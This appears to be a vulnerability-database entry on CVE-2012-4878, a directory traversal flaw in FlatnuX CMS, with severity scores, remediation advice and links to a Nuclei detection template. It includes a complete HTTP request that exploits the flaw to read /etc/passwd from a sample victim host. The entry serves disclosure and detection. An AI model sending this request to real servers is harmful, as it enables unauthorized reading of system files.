| Title | FlatnuX CMS - Directory Traversal |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | An attacker can read or modify sensitive files on the server, potentially leading to unauthorized accessand data leakage. |
| Remediation | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FlatnuX CMS. |
| CVSS Score | 5 |
| EPSS Score | 0.14501 |
| CVE ID | CVE-2012-4878 |
| CWE ID | CWE-22 |
| Tags | cve cve2012 lfi traversal edb packetstorm flatnux xss vuln |
A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
GET /controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2012/CVE-2012-4878.yaml
🦈 Packet Capture: ⬇️ Download cve-2012-4878.pcap
N/AN/A